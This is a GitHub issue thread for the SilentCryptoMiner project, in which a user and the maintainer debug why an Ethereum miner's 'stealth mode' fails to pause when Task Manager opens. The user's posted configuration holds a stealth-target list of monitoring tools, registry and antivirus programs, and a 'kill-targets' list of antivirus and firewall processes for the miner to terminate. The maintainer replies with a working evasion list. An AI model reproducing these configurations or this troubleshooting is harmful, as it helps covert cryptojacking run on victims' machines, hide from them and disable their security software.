### ISSUE TITLE
Stealth mode does not work for the ethminer

### ISSUE THREAD

**Issue by zozidalom** [UnamSanctam/SilentCryptoMiner#761]
Hi Unam, 

I have created a file with two miners. One is ETH the other is XMR. The stealth targets are the same for both. Stealth targets include Taskmanager for both ones. Once I open up the taskmanager, the XMR miner goes into stealth mode, but the ETH one does not. I tested it out on my 4GPU mining rig, and it's not just reporting fake status to the panel, it's mining still.

Any ideas?

**Comment by UnamSanctam** [comment]
And "Stealth" is on? It's working for me (and both XMR and ETH have the same code for stealth). Run the checker and post what it says.

**Comment by zozidalom** [comment]
Yes, it's turned on in the builder. (for both miners)

![image](https://user-images.githubusercontent.com/24374345/169590983-1e26e36f-ce4e-495b-a62e-95898057659d.png)
![image](https://user-images.githubusercontent.com/24374345/169590047-a062505f-ca7b-435f-b6fe-8fce981f4afe.png)
![image](https://user-images.githubusercontent.com/24374345/169590876-5153d545-ba35-40d1-b07d-b37d8c353191.png)

**Comment by UnamSanctam** [comment]
What program are you using to test the stealth? Since you don't have the Task Manager in the "Stealth Targets" for the XMR miner, you also have an empty entry right after procexp64.exe.

**Comment by zozidalom** [comment]
Sorry the XMR miner has a remote configuration set up, where Task Manager is included.

**Comment by zozidalom** [comment]
That's why it's in stealth mode.

**Comment by zozidalom** [comment]
Okay I see the empty entry on the image I sent, but I don't think that's the issue since it's only there for XMR, and XMR works fine. My issue is, that stealth mode is not turning on in the ETH miner.

**Comment by UnamSanctam** [comment]
Post your ETH configuration, with the example settings in the wiki it's pausing just fine for me.

**Comment by zozidalom** [comment]
```
{
    "url": "stratumss://`myaddress`.myworkername@eu1.ethermine.org:5555",
    "algo": "ethash",
    "max-gpu": 30,
    "idle-wait": 1,
    "idle-gpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,farcry3.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,Wow.exe,WowClassic.exe,Overwatch.exe,League of Legends.exe,dota2.exe,r5apex.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,FortniteClient-Win64-Shipping_EAC.exe,RustClient.exe,RocketLeague.exe,escapefromtarkov.exe,Cyberpunk2077.exe,osu!.exe,Photoshop.exe,CINEMA 4D.exe,AfterFX.exe,VideoEditorPlus.exe,Battlerite.exe,DeadByDaylight.exe,payday2_win32_release.exe,hl2.exe,destiny2.exe,RDR2.exe,DayZ.exe,Fallout4.exe,FarCry5.exe,bfv.exe,TS4.exe,eso64.exe,PathOfExile.exe,witcher3.exe,Valorant.exe,MSIAfterburner.exe,Vanguard.exe,Battlefield2042.exe,Battlefield.exe,2042.exe,BF2042.exe,Battlefield™2042.exe,farcry4.exe,farcry6.exe,Borderlands3.exe,Farcry6.exe,re7.exe,RE6.exe,HaloInfinite.exe,forza horizon 5.exe,forzahorizon5.exe,forzahorizon4.exe,forza horizon 4.exe,launcher.exe,re8.exe,GOTG.exe,Tales of Arise.exe,TalesofArise.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,FiveM_GTAProcess.exe,Falluot4.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,AnVir.exe,PLlhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}
```

**Comment by UnamSanctam** [comment]
Hmm, I can't really replicate it
<img src="https://user-images.githubusercontent.com/10323655/169611186-a5b9dcdc-3ecf-4fe5-873d-3c89bb6fdadd.png">
Are you sure that's the configuration that actually gets used? Can you try changing the port to 4444 and `stratumss` to `stratum` just to make sure that's the one being used?

**Comment by zozidalom** [comment]
Okay I made the change, ran the miner&checker, and yes it's this config that is being used.

I also checked it on another PC (only 4GB of RAM so ETH hashrates are painfully slow there) but it did not enter stealth mode there either once I opened the task manager.

I also tried opening other programs on the list but none of them seems to make it enter stealth mode.

**Comment by UnamSanctam** [comment]
Can you try with the example settings https://github.com/UnamSanctam/SilentCryptoMiner/wiki#example-settings and see if it works?

**Comment by zozidalom** [comment]
I tested it out, it seems to be working with the FullExample config.

**Comment by zozidalom** [comment]
@UnamSanctam Now you added the stealth mode on the full-screen option in the newest version, I checked it out with that one and that works. 

However, entering stealth mode with process detection is still not working (for ETH is doesn't work, it works with the same target for XMR)

**Comment by UnamSanctam** [comment]
Are you sure the targets are 100% the same? It sounds like most likely you have some error in your "Stealth Targets". I use these targets and they work just fine:
```
"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
```

**Comment by zozidalom** [comment]
Okay it works with theese, I will figure it out from now on, it's definitely something with mine wrong.
